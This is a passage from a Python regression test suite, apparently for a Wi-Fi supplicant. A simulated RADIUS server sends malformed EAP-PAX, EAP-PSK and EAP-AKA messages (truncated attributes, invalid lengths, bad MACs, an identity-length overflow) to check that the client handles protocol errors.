EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0x8a, 0xc2, 0xf9, 0xf4, 0x8b, 0x75, 0x72, 0xa2,
0x4d, 0xd3, 0x1e, 0x54, 0x77, 0x04, 0x05, 0xe2)
idx += 1
if ctx['num'] & 0x1 == idx & 0x1:
logger.info("Test: Default request")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_PAX)
else:
logger.info("Test: Default EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(pax_handler)
if srv is None:
return "skip"
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 18):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="user",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
logger.info("Waiting for EAP method to start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
logger.info("Too short password")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="user",
password_hex="0123456789abcdef0123456789abcd",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
logger.info("No password")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="user",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_psk(dev, apdev):
"""EAP-PSK protocol tests"""
def psk_handler(ctx, req):
logger.info("psk_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_PSK)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Non-zero T in first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0xc0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short third message")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_PSK)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Incorrect T in third message")
return struct.pack(">BBHBB4L4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing PCHANNEL in third message")
return struct.pack(">BBHBB4L4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 16,
EAP_TYPE_PSK, 0x80, 0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalic MAC_S in third message")
return struct.pack(">BBHBB4L4L5LB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 16 + 21,
EAP_TYPE_PSK, 0x80, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(psk_handler)
if srv is None:
return "skip"
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 6):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="user",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
logger.info("Test: Invalid PSK length")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="user",
password_hex="0123456789abcdef0123456789abcd",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
EAP_SIM_SUBTYPE_START = 10
EAP_SIM_SUBTYPE_CHALLENGE = 11
EAP_SIM_SUBTYPE_NOTIFICATION = 12
EAP_SIM_SUBTYPE_REAUTHENTICATION = 13
EAP_SIM_SUBTYPE_CLIENT_ERROR = 14
EAP_AKA_SUBTYPE_CHALLENGE = 1
EAP_AKA_SUBTYPE_AUTHENTICATION_REJECT = 2
EAP_AKA_SUBTYPE_SYNCHRONIZATION_FAILURE = 4
EAP_AKA_SUBTYPE_IDENTITY = 5
EAP_AKA_SUBTYPE_NOTIFICATION = 12
EAP_AKA_SUBTYPE_REAUTHENTICATION = 13
EAP_AKA_SUBTYPE_CLIENT_ERROR = 14
EAP_SIM_AT_RAND = 1
EAP_SIM_AT_AUTN = 2
EAP_SIM_AT_RES = 3
EAP_SIM_AT_AUTS = 4
EAP_SIM_AT_PADDING = 6
EAP_SIM_AT_NONCE_MT = 7
EAP_SIM_AT_PERMANENT_ID_REQ = 10
EAP_SIM_AT_MAC = 11
EAP_SIM_AT_NOTIFICATION = 12
EAP_SIM_AT_ANY_ID_REQ = 13
EAP_SIM_AT_IDENTITY = 14
EAP_SIM_AT_VERSION_LIST = 15
EAP_SIM_AT_SELECTED_VERSION = 16
EAP_SIM_AT_FULLAUTH_ID_REQ = 17
EAP_SIM_AT_COUNTER = 19
EAP_SIM_AT_COUNTER_TOO_SMALL = 20
EAP_SIM_AT_NONCE_S = 21
EAP_SIM_AT_CLIENT_ERROR_CODE = 22
EAP_SIM_AT_KDF_INPUT = 23
EAP_SIM_AT_KDF = 24
EAP_SIM_AT_IV = 129
EAP_SIM_AT_ENCR_DATA = 130
EAP_SIM_AT_NEXT_PSEUDONYM = 132
EAP_SIM_AT_NEXT_REAUTH_ID = 133
EAP_SIM_AT_CHECKCODE = 134
EAP_SIM_AT_RESULT_IND = 135
EAP_SIM_AT_BIDDING = 136
def test_eap_proto_aka(dev, apdev):
"""EAP-AKA protocol tests"""
def aka_handler(ctx, req):
logger.info("aka_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_AKA)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown subtype")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_AKA, 255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Client Error")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CLIENT_ERROR)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short attribute header")
return struct.pack(">BBHBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated attribute")
return struct.pack(">BBHBBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short attribute data")
return struct.pack(">BBHBBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Skippable/non-skippable unrecognzized attribute")
return struct.pack(">BBHBBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 10,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
255, 1, 0, 127, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request without ID type")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request PERMANENT_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request PERMANENT_ID (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with BIDDING")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_BIDDING, 1, 0x8000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success, but no MAC")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success, but invalid MAC value")
return struct.pack(">BBHBBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 20,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success with zero-key MAC")
return struct.pack(">BBHBBHBBHBBH16B", EAP_CODE_REQUEST,
ctx['id'] - 2,
4 + 1 + 3 + 4 + 20,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768,
EAP_SIM_AT_MAC, 5, 0,
0xbe, 0x2e, 0xbb, 0xa9, 0xfa, 0x2e, 0x82, 0x36,
0x37, 0x8c, 0x32, 0x41, 0xb7, 0xc7, 0x58, 0xa3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 16384)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 16385)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification with unrecognized non-failure")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Re-authentication (unexpected) with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_REAUTHENTICATION,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with Checkcode claiming identity round was used")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with Checkcode claiming no identity round was used")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_CHECKCODE, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with mismatching Checkcode value")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Re-authentication (unexpected) with Checkcode claimin identity round was used")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_REAUTHENTICATION,
0,
EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RAND length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RAND, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_AUTN length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_AUTN, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_PADDING")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_PADDING, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_NONCE_MT length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NONCE_MT, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_MAC length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_MAC, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_NOTIFICATION length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NOTIFICATION, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AT_IDENTITY overflow")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_IDENTITY, 1, 0xffff)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_VERSION_LIST")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_VERSION_LIST, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_SELECTED_VERSION length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_SELECTED_VERSION, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_COUNTER")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_COUNTER, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_COUNTER_TOO_SMALL")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_COUNTER_TOO_SMALL, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_NONCE_S")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NONCE_S, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_CLIENT_ERROR_CODE length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_CLIENT_ERROR_CODE, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_IV length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_IV, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_ENCR_DATA length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ENCR_DATA, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_NEXT_PSEUDONYM")
